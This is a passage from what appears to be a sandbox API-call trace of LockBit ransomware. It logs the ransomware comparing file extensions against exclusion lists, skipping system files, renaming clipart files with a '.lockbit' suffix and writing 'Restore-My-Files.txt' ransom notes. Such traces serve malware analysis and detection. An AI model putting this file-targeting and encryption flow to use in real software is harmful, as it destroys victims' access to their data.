(lpString1=".7z", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.728] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.728] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.728] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.728] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.728] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.728] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.728] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.728] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00694_.WMF.lockbit") returned 72 [0175.728] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00694_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00694_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.734] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.734] malloc (_Size=0x40068) returned 0x3df0008 [0175.734] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=25346) returned 1 [0175.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.735] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.735] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.735] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.735] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.737] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00694_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00694_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.737] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.737] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.739] free (_Block=0x1fa2ed8) [0175.739] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00694_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.739] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.739] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.739] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3636, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00704_.WMF", cAlternateFileName="")) returned 1 [0175.739] lstrcmpiW (lpString1=".", lpString2="SO00704_.WMF") returned -1 [0175.739] lstrcmpiW (lpString1="..", lpString2="SO00704_.WMF") returned -1 [0175.739] PathFindExtensionW (pszPath="SO00704_.WMF") returned=".WMF" [0175.739] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.739] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.739] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.739] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.739] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.739] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.739] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.739] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.739] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.739] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.739] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.740] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.741] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.741] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00704_.WMF") returned -1 [0175.741] lstrcmpiW (lpString1="ntldr", lpString2="SO00704_.WMF") returned -1 [0175.741] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00704_.WMF") returned -1 [0175.741] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00704_.WMF") returned -1 [0175.741] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00704_.WMF") returned -1 [0175.742] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00704_.WMF") returned 1 [0175.742] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00704_.WMF") returned -1 [0175.742] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.742] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00704_.WMF") returned=".WMF" [0175.742] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.742] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.742] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.743] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.743] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.743] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.743] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.743] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.743] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.743] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.743] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.743] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.743] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00704_.WMF.lockbit") returned 72 [0175.743] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00704_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00704_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.744] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.744] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.744] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=13878) returned 1 [0175.744] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.745] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.745] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.745] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.746] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.754] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00704_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00704_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.754] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.754] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.755] free (_Block=0x1fa2ed8) [0175.755] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00704_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.755] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.755] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.755] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6697b000, ftCreationTime.dwHighDateTime=0x1bd4af2, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6697b000, ftLastWriteTime.dwHighDateTime=0x1bd4af2, nFileSizeHigh=0x0, nFileSizeLow=0x16478, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00726_.WMF", cAlternateFileName="")) returned 1 [0175.756] lstrcmpiW (lpString1=".", lpString2="SO00726_.WMF") returned -1 [0175.756] lstrcmpiW (lpString1="..", lpString2="SO00726_.WMF") returned -1 [0175.756] PathFindExtensionW (pszPath="SO00726_.WMF") returned=".WMF" [0175.756] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.756] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.757] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.757] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00726_.WMF") returned -1 [0175.758] lstrcmpiW (lpString1="ntldr", lpString2="SO00726_.WMF") returned -1 [0175.758] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00726_.WMF") returned -1 [0175.758] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00726_.WMF") returned -1 [0175.758] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00726_.WMF") returned -1 [0175.758] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00726_.WMF") returned 1 [0175.758] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00726_.WMF") returned -1 [0175.758] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.758] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00726_.WMF") returned=".WMF" [0175.758] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.758] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.758] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.759] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.759] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.759] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.759] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.759] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.759] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.759] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.759] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.759] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.759] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.759] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00726_.WMF.lockbit") returned 72 [0175.759] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00726_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00726_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.760] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.760] malloc (_Size=0x40068) returned 0x3df0008 [0175.760] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=91256) returned 1 [0175.760] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.761] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.761] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.762] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.762] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.767] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00726_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00726_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.767] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.767] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.769] free (_Block=0x1fa2ed8) [0175.769] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00726_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.769] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.769] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.769] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d1f5400, ftCreationTime.dwHighDateTime=0x1bd4b44, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4d1f5400, ftLastWriteTime.dwHighDateTime=0x1bd4b44, nFileSizeHigh=0x0, nFileSizeLow=0x1758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00728_.WMF", cAlternateFileName="")) returned 1 [0175.769] lstrcmpiW (lpString1=".", lpString2="SO00728_.WMF") returned -1 [0175.769] lstrcmpiW (lpString1="..", lpString2="SO00728_.WMF") returned -1 [0175.769] PathFindExtensionW (pszPath="SO00728_.WMF") returned=".WMF" [0175.769] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.769] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.769] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.769] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.769] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.769] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.769] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 